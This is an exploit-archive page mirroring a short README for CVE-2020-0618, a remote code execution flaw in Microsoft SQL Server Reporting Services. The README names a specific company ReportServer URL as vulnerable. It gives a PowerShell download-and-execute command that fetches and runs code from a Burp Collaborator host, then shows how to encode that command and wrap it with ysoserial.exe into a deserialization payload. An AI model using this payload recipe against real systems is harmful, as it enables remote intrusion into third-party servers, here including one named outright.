Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-0618 PoC — Microsoft SQL Server Reporting Services 代码问题漏洞

Source
https://github.com/itstarsec/CVE-2020-0618
Associated Vulnerability
Title:Microsoft SQL Server Reporting Services 代码问题漏洞 (CVE-2020-0618)
Description:A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'.
Description
Melissa
Readme
# CVE-2020-0618
Melissa
https://status.melissa.com/ReportServer_CUSTOMERSQL/Pages/ReportViewer.aspx <- link bị dính lỗ hổng

$command = '(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr("https://qoigyuef2a4z1a7rsir6lvi3eukl8a.burpcollaborator.net/In")|iex'

$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)

$encodedCommand = [Convert]::ToBase64String($bytes)

.\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "powershell.exe -encodedCommand $encodedCommand" -o base64 | clip

# Tham khảo:
 - https://github.com//euphrat1ca//CVE-2020-0618
 - https://www.exploit-db.com/exploits/48816
 - https://github.com/pwntester/ysoserial.net/releases
File Snapshot

 [4.0K]  /data/pocs/45acd20d083a36ef5b3ce09318ea10cc4317d831
└── [ 717]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →